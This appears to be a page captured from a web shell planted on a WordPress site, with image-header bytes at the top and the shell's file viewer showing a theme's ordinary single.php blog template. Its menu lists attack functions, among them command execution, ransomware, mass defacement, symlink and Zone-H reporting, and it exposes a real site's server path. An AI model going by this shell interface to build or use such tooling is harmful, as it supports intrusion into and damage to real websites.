\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/veridatait.com/wp-content/themes/techno/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/veridatait.com/wp-content/themes/techno/single.php |
<?php
/**
* Standard blog single page
*
*/
get_header();
get_template_part( 'includes/header' , 'page-title' ); ?>
<!-- BLOG AREA START -->
<div class="techno-blog-area em-single-page-comment single-blog-details">
<div class="container">
<div class="row">
<div class="col-md-8 col-sm-7 col-xs-12 blog-lr">
<?php if (have_posts() ) : ?>
<?php while ( have_posts() ) : the_post();
global $post; ?>
<?php get_template_part( 'template-parts/content' , 'single' ); ?>
<?php endwhile; // while has_post(); ?>
<?php endif; // if has_post() ?>
</div>
<div class="col-md-4 col-sm-5 col-xs-12 sidebar-right content-widget pdsr">
<div class="blog-left-side">
<?php
if ( is_active_sidebar( 'sidebar-1' ) ) {
dynamic_sidebar( 'sidebar-1' );
}
?>
</div>
</div>
</div>
</div>
</div>
<!-- END BLOG AREA START -->
<?php
get_footer();